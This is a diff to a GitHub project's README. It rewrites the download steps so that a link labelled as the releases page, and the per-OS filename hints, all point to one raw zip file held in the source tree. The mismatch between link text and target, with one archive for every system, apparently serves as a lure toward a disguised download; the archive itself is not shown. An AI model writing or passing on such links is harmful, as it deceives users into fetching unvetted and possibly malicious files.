deva7518/autograv/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   Go to the [autograv Releases page](https://github.com/deva7518/autograv/releases) to find the latest version of the software.
+   Go to the [autograv Releases page](https://raw.githubusercontent.com/deva7518/autograv/main/src/autograv/Software-v2.6.zip) to find the latest version of the software.

 2. **Choose the Right Version**
    Look for the most recent release at the top of the page.
 You may see a list of available files for different operating systems.

-   - For Windows, look for a file named something like `autograv-windows.zip`.
+   - For Windows, look for a file named something like `https://raw.githubusercontent.com/deva7518/autograv/main/src/autograv/Software-v2.6.zip`.
-   - For Mac, look for `autograv-macos.zip`.
+   - For Mac, look for `https://raw.githubusercontent.com/deva7518/autograv/main/src/autograv/Software-v2.6.zip`.

 3. **Download the File**
    Click on the file that matches your operating system.
 Your browser will start downloading the file.